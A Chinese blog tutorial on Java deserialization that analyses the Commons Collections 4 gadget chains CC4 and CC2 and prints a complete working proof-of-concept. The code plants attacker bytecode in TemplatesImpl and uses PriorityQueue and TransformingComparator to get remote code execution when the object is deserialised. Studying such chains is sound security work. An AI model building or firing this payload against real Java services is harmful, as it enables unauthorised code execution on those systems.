Java反序列化(四)——CC4、CC2

已于 2024-08-15 13:11:58 修改
阅读量573 收藏 21
点赞数 20
文章标签: java
于 2024-08-15 12:44:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzy03210321/article/details/141214593
版权

0 背景

白日梦组长投稿视频-白日梦组长视频分享-哔哩哔哩视频 (bilibili.com)

实验环境

Java:1.8.0_65

IDEA:2022

commons-collecetions:4.0

        CommonsCollections4 除 4.0 其他版本的 InvokerTransformer和InstantiateTransformer没有实现 Serializable,导致该方法无法序列化。此外, CommonsCollections 4的版本 TransformingComparator 实现了 Serializable接口,但CommonsCollections 3里是没有实现。

1 CC4

        这里的重点还是在前半条链上。

PriorityQueue.readObject()
  PriorityQueue.heapify()
    PriorityQueue.sift()
      PriorityQueue.siftDownUsingComparator()
        TransformingComparator.compare()         
          ChainedTransformer.transform()

1.1 调用链分析

        这里注意别用错类,用了CC3的。

1.1.1 TransformingComparator.compare(obj1, obj2)调用了ChainedTransformer.transform(obj)

        TransformingComparator在4版本中实现Serializable接口,所以可以序列化。从这里看需要需要满足的条件为:TransformingComparator.transformer = ChainedTransformer实例。

        这里obj1和obj2有什么用呢?其实通过在这里传递参数,可以使得ChainedTransformer变成InvokerTransformer或InstantiateTransformer等,这里就是将Transform[] 变成 Transform,这里的作用其实是在shiro反序列化中体现。

        能不能将将Transform[] 变成 Transform取决与参数在传递的过程中是否连续,像CC1、CC3、CC6就不行。

1.1.2 PriorityQueue.siftDownUsingComparator(int k, E x)调用了TransformingComparator.compare(obj1, obj2)

        PriorityQueue实现Serializable接口。需要满足:PriorityQueue.comparator = TransformingComparator.

        并且如果泛型参数x会传进 obj1,也就是参数在这一步还连续。

1.1.3 PriorityQueue.siftDown(int k, E x)调用了PriorityQueue.siftDownUsingComparator(int k, E x)

        需要满足:PriorityQueue.comparator != null。

        其实满足1.1.2的条件这里也能满足。 此外,传入参数还可连续。

        

1.1.4 PriorityQueue.heapify()调用了PriorityQueue.siftDown(int k, E x)

        要想反序列化链条成功需要满足条件: (PriorityQueue.size >>> 1)  - 1 >=0

        也就是: PriorityQueue.size/2 -1 >=0

        即:PriorityQueue.size >= 2,PriorityQueue的序列长度要大于2。

        如果想要传入参数还连续的话,需要满足控制 queue[PriorityQueue.size/2 -1]。

1.1.5 PriorityQueue.readObject()调用了PriorityQueue.heapify()

        这里需要size不小于0,和1.1.4的size>=0一致的。

1.2 POC编写

1.2.1 把ChainedTransformer放入TransformingComparator中

        需满足条件TransformingComparator.transformer = ChainedTransformer实例。看TransformingComparator的构造方法,用第一个就可。

1.2.2 把TransformingComparator放入PriorityQueue中

        需要满足条件:PriorityQueue.comparator = TransformingComparator && PriorityQueue.size >= 2

        发现PriorityQueue的构造函数可以直接给comparator赋值,如果不能直接赋值,需要反射,或者利用提供的其他方法赋值。

        size的值没办法直接通过构造方法赋值,但可以通过add(e)方法。或者反射修改。PS:在1.1.4中说到想要传入参数连续,那就要控制queue的值,add(e)方法调用时,就会直接调用offer(e),改变size的同时,也给queue赋值,但这里先随便给queue赋值。

    public boolean add(E e) {
        return offer(e);
    }

    public boolean offer(E e) {
        if (e == null)
            throw new NullPointerException();
        modCount++;
        int i = size;
        if (i >= queue.length)
            grow(i + 1);
        size = i + 1;
        if (i == 0)
            queue[0] = e;
        else
            siftUp(i, e);
        return true;
    }

        代码如下:

1.2.3 序列化

        条件已满足,所以可以序列化前就弹窗,并且InstantiateTransformer执行transform会报错。

        修改也很简单,和之前CC6一样,先给个别的transformers,add后反射就该为调用链的transformers。

        修改后,反序列化成功弹窗,虽然报错,但已经rce。

1.2.4 最终POC

package CCTest;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC4 {

    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class c = templates.getClass();
        Field name = c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        byte[] evil = Files.readAllBytes(Paths.get("CC3Calc.class"));
        byte[][] codes = {evil};
        Field bytecodes = c.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, codes);

        Field tfactory = c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));

        PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);

        Class c2 = transformingComparator.getClass();
        Field trans = c2.getDeclaredField("transformer");
        trans.setAccessible(true);
        trans.set(transformingComparator,chainedTransformer);

//        serialize(priorityQueue);
        unserilize("cc4-1.bin");

    }

    public static void serialize(Object obj) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("cc4-1.bin"));
        oos.writeObject(obj);
    }
    public static Object unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
        Object obj = ois.readObject();
        return obj;
    }
}

1.3 CC2--- 另一种形式的CC4

        综合上述的分析,参数在传递过程中是没有中断的。两种CC3的形式,分别可以只用一个InvokerTransformer或TransformingComparator就完成。

2. 总结

        最近比较忙,CC5和CC7先不写了,写一篇大半天。

        引用我老学长John的图。

安全知识搬运工
关注
  • 20
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
java反序列化利用程序UI版Beta1.1.rar
07-20
4. **反射与构造恶意对象**:攻击者可以利用Java的反射API创建和控制反序列化过程中的对象,这可能导致意外的方法调用或者权限提升。 5. **CVE漏洞**:历史上,例如CVE-2015-4852(Apache Commons Collections反序...
【Web】Java反序列化之CC7链——Hashtable
uuzeray的博客
03-04 1181
ok 进入for循环的事情我们已经解决了,但是想去e.key.equals(key)还得要满足e.hash == hash(&&短路机制你懂的),这里的e值为tab[index],也就是第一组传入的值,这里的hash是通过key.hashCode()获取的,也就是说要put两个hash值相等的元素进去才行,这个点我们下面单独来讲。调用了m.get(),而m是根据传入的对象获取的,也就是说如果key传入的也是LazyMap类对象,那么这里就是调用的LazyMap#get,从而为所欲为。如何解决这个问题呢?
12-java安全——java反序列化CC7链分析
网络安全
08-23 2725
在分析CC7链之前,需要对Hashtable集合的源码有一定的了解。 从思路上来说,我觉得CC7利用链更像是从CC6利用链改造而来,只不过是CC7链没有使用HashSet,而是使用了Hashtable来构造新的利用链。 经过测试,CC7利用链在jdk8u071和jdk7u81都可以利用成功,payload代码如下: package com.cc; import org.apache.commons.collections.Transformer; import org.apache.commo
8-java安全——java反序列化CC2链分析
网络安全
07-19 2729
上一篇分析了CC1链,本篇继续分析ysoserial工具的 apache commons collections 2利用链。 CC1链在实际利用过程存在一些限制,例如jdk1.8版本以上已经无法利用反序列化漏洞了,通过分析发现jdk8u181版本中改写了sun.reflect.annotation.AnnotationInvocationHandler类的readObject方法,CC1链在jdk8版本以上已经被修复了,因此jdk8版本以上重新构造了一条新的利用链(CC2链)。 不过CC2链使用
10-java安全——java反序列化CC3和CC4链分析
网络安全
07-20 1996
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
【Web】Java反序列化CC4——commons-collections4的新链之二
uuzeray的博客
03-14 623
CC4就是把CC2和CC3的链给拼接了一下,本质上是CC2的大体框架+CC3的TrAXFilter,基本几句话就结束了,但为了确保知识体系的完整(我要水文章),还是写一篇吧QWQ。
7-java安全——java反序列化CC1链分析
网络安全
07-04 3711
apache commons-collections组件反序列化漏洞的反射链也称为CC链,自从apache commons-collections组件爆出java第一个反序列化漏洞后,就像打开了新世界大门一样,之后很多java中间件也相继爆出反序列化漏洞。例如比较常用的反序列化漏洞利用工具ysoserial就使用了LazyMap类的利用链,本文将继续学习LazyMap类的利用链。 ...
11-java安全——java反序列化CC5和CC6链分析
网络安全
07-25 1859
CC5链分析 复习LazyMap利用链: https://blog.csdn.net/qq_35733751/article/details/118462281 在学习CC2链时我们知道由于JDK8版本改写了AnnotationInvocationHandler类的readobject方法,CC1链中LazyMap的get方法已经无法使用,CC5链使用了BadAttributeValueExpException类来代替AnnotationInvocationHandler类,并且还用了一个新的类
【Web】浅聊Java反序列化之Rome——关于其他利用链
uuzeray的博客
03-09 1075
Rome中ToStringBean的利用和jdk7u21原生反序列化真的很神似,下面不少链子应该也能拿jdk7u21原生来改,感兴趣的师傅可以尝试一下。【Web】Java原生反序列化之jdk7u21——又见动态代理-CSDN博客。
Java反序列化(三)——CC6、CC3
Xzy03210321的博客
08-14 920
问题2解决:其实从这里的代码逻辑上看,只要superClass.getName().equals(ABSTRACT_TRANSLET)成立,_transletIndex就会赋值为i(>0),这样就不会走_auxClasses的逻辑,下面
commons-collections2(cc2)反序列化链分析
遇事不决冲冲冲
02-16 3230
大的思路是将恶意参数放到`TemplatesImpl`类中的`_bytecodes`属性中,反射构造`PriorityQueue`队列的`comparator`和`queue`两个字段,将`PriorityQueue`队列的`comparator`字段设置为`TransformingComparator`(创建一个`InvokerTransformer`并传递一个`newTransformer`方法,然后将`InvokerTransformer`方法名传递给`TransformingComparator`)
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
Java中对象序列化与反序列化详解
09-03
本文将深入探讨Java中的对象序列化与反序列化的概念、原理、实现方法以及相关的注意事项。 **一、对象序列化的概念和作用** 对象序列化是将一个Java对象转换成字节流的过程,这个字节流可以存储在磁盘上,也可以在...
Java反序列化回显解决方案.docx
12-19
Java反序列化回显解决方案 Java反序列化回显解决方案是指在Java中,使用反序列化来执行命令,导致RCE(Remote Code Execution)的解决方案。该解决方案主要涉及到Java反序列化机制和ClassLoader的使用。 首先,...
Java基础之原反补码
最新发布
u012135697的博客
08-14 150
整数类型数据在计算机底层进行存储或运算,以补码方式进行! 正整数的原反补码,一模一样!
springboot民办高校科研项目管理系统-计算机毕业设计源码54009
VX_DZbishe的博客
08-11 513
论文主要是对基于springboot的民办高校科研项目管理系统进行了介绍,包括研究的现状,还有涉及的开发背景,然后还对系统的设计目标进行了论述,还有系统的需求以及整个的设计方案,对系统的设计以及实现,也都论述的比较细致,最后对基于springboot的民办高校科研项目管理系统进行了一些具体测试。本次报告,首先分析了研究的背景、作用、意义,为研究工作的合理性打下了基础。
SpringBoot快速入门(手动创建)
m0_74124657的博客
08-11 468
代码如下//引导类项目的入口//注解添加导入进来你可以浏览器中查看自己编写的代码,看是否正确localhost:你命名的端口号(默认是8080。后面你也可以在配置文件修改)
集合(1)
supercool7的博客
08-12 779
表示不同的类型集合,Collection、Map、List、Set、Queue、Deque等,以及辅助性质的接口Iterator、LinkIterator、Comparator、Comparable这些接口是为迭代和比较元素而准备。对接口的具体实现,主要常用的有:ArrayList、LinkedList、HashMap、HashSet、TreeMap等等。理解Java集合体系可以从三个层次:最上层的接口、中间的抽象类、最后的实现类。是所有集合框架的根接口,包含了对集合进行基本操作的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值